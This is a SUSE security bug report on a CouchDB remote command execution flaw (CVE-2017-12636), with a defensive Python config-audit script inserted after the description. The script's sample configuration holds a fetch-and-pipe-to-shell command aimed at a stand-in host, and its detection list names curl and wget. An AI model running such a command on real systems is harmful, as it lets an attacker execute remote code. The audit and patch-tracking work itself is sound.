Bug 1068386 (CVE-2017-12636)

Summary: VUL-0: CVE-2017-12636: couchdb: CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This
Product: [Novell Products] SUSE Security Incidents
Reporter: Marcus Meissner <meissner>
Component: Incidents
Assignee: Security Team bot <security-team>
Status: RESOLVED FIXED
QA Contact: Security Team bot <security-team>
Severity: Major
Priority: P3 - Medium
CC: jsuchome, smash_bz, wolfgang.frisch
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
URL: https://smash.suse.de/issue/194964/
Whiteboard: CVSSv3:SUSE:CVE-2017-12635:8.1:(AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) CVSSv3:SUSE:CVE-2017-12636:9.9:(AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) CVSSv2:SUSE:CVE-2017-12635:6.8:(AV:N/AC:L/Au:S/C:N/I:C/A:N) CVSSv2:SUSE:CVE-2017-12636:6.5:(AV:N/AC:L/Au:S/C:P/I:P/A:P) CVSSv3:RedHat:CVE-2017-12635:6.5:(AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N) CVSSv3:RedHat:CVE-2017-12636:4.7:(AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L) CVSSv2:NVD:CVE-2017-12636:9.0:(AV:N/AC:L/Au:S/C:C/I:C/A:C) CVSSv2:NVD:CVE-2017-12635:10.0:(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Description Marcus Meissner 2017-11-16 07:21:22 UTC
CVE-2017-12636

CouchDB administrative users can configure the database server via HTTP(S). Some
of the configuration options include paths for operating system-level binaries
that are subsequently launched by CouchDB. This allows an admin user in Apache
CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as
the CouchDB user, including downloading and executing scripts from the public
internet.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12636
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635
http://seclists.org/oss-sec/2017/q4/279
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635
https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
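The description above gives two things a defender can check for: the affected version range (before 1.7.0, and 2.x before 2.1.1) and configuration entries that name operating-system binaries CouchDB will launch. The script below is an added example, not part of this bug report and not CouchDB's own tooling. It compares a configuration document of the shape returned by CouchDB's `_config` endpoint ({section: {key: value}}) against a known-good baseline and flags drift or values that reference downloads or shell pipelines. The section names `query_servers`, `native_query_servers` and `os_daemons` are taken from CouchDB's configuration reference rather than from this bug, and the sample configuration and baseline are constructed, not captured from a real server.

```python
import re
from typing import Dict, List, Tuple

# Fix boundaries named in the CVE text on this bug: 1.7.0 for the 1.x line
# and 2.1.1 for the 2.x line.
FIXED_1X = (1, 7, 0)
FIXED_2X = (2, 1, 1)

# Configuration sections whose values CouchDB turns into operating-system
# processes. Assumed from CouchDB's configuration reference; the bug itself
# does not list them.
PROCESS_LAUNCHING_SECTIONS = ("query_servers", "native_query_servers", "os_daemons")

# Signs that a value does more than name a local interpreter binary.
SUSPICIOUS_TOKENS = ("http://", "https://", "curl ", "wget ", "|", ";", "&&", "/tmp/", "/dev/shm/")


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '1.7.2' or '2.1.1-beta' into a comparable (major, minor, patch) tuple."""
    nums: List[int] = []
    for part in version.strip().split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        nums.append(int(m.group()))
    while len(nums) < 3:
        nums.append(0)
    return (nums[0], nums[1], nums[2])


def is_vulnerable_version(version: str) -> bool:
    """True if the reported version falls inside the affected range from the CVE text."""
    v = parse_version(version)
    if v < FIXED_1X:                 # everything before 1.7.0
        return True
    if v[0] == 2 and v < FIXED_2X:   # 2.x before 2.1.1
        return True
    return False


def audit_config(config: Dict[str, Dict[str, str]],
                 baseline: Dict[str, Dict[str, str]]) -> List[str]:
    """Compare process-launching sections against a known-good baseline.

    Returns one finding string per entry that is absent from the baseline,
    differs from it, or contains a suspicious token. An unchanged, clean
    configuration yields an empty list.
    """
    findings: List[str] = []
    for section in PROCESS_LAUNCHING_SECTIONS:
        expected = baseline.get(section, {})
        for key, value in sorted(config.get(section, {}).items()):
            if key not in expected:
                findings.append(f"[{section}] {key}: not in baseline -> {value!r}")
            elif expected[key] != value:
                findings.append(f"[{section}] {key}: changed from {expected[key]!r} to {value!r}")
            if any(tok in value for tok in SUSPICIOUS_TOKENS):
                findings.append(f"[{section}] {key}: suspicious content -> {value!r}")
    return findings


# Constructed sample data (not captured from a real server). Paths follow the
# usual couchjs layout only to look realistic.
BASELINE = {
    "query_servers": {
        "javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js",
        "coffeescript": "/usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js",
    },
    "os_daemons": {},
}

SAMPLE_CONFIG = {
    "couchdb": {"database_dir": "/var/lib/couchdb"},
    "query_servers": {
        "javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js",
        "coffeescript": "/usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js",
        # constructed example of the kind of entry the CVE text describes
        "cmd": "/bin/sh -c 'curl http://example.invalid/x.sh | sh'",
    },
    "os_daemons": {"helper": "/tmp/helper"},
}

if __name__ == "__main__":
    for ver in ("1.6.1", "1.7.2", "2.0.0", "2.1.1"):
        print(ver, "vulnerable" if is_vulnerable_version(ver) else "fixed")
    for line in audit_config(SAMPLE_CONFIG, BASELINE):
        print(line)
```

The baseline comparison is the useful part in practice: a patched server still lets an administrator set these values, so the check belongs in routine configuration monitoring, and the version test only tells you whether the patch restricting such changes is in place.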
Comment 2 Keith Berger 2018-03-23 14:16:55 UTC
https://trello.com/c/I1KCfwb2
Comment 3 Jiří Suchomel 2018-03-26 11:02:59 UTC
So, building the 1.7.1 version is not difficult:

https://build.suse.de/package/show/home:jsuchome:branches:Devel:Cloud:8/couchdb
Comment 4 Jiří Suchomel 2018-03-27 12:39:08 UTC
SR for Cloud8: https://build.suse.de/request/show/160311
Comment 6 Jiří Suchomel 2018-03-28 07:52:10 UTC
SR for SOC7: https://build.suse.de/request/show/160449
Comment 7 Jiří Suchomel 2018-04-04 09:24:55 UTC
Cloud packages updated
Comment 9 Jiří Suchomel 2018-07-24 15:21:33 UTC
Created a maintenance request; I hope it's correct this way:

https://build.suse.de/request/show/168824
Comment 13 Swamp Workflow Management 2018-08-31 16:13:29 UTC
SUSE-SU-2018:2578-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1068386,1100973
CVE References: CVE-2017-12636,CVE-2018-8007
Sources used:
SUSE OpenStack Cloud 7 (src):    couchdb-1.7.2-2.8.2
SUSE Enterprise Storage 4 (src):    couchdb-1.7.2-2.8.2
Comment 14 Wolfgang Frisch 2020-09-24 13:31:40 UTC
Released.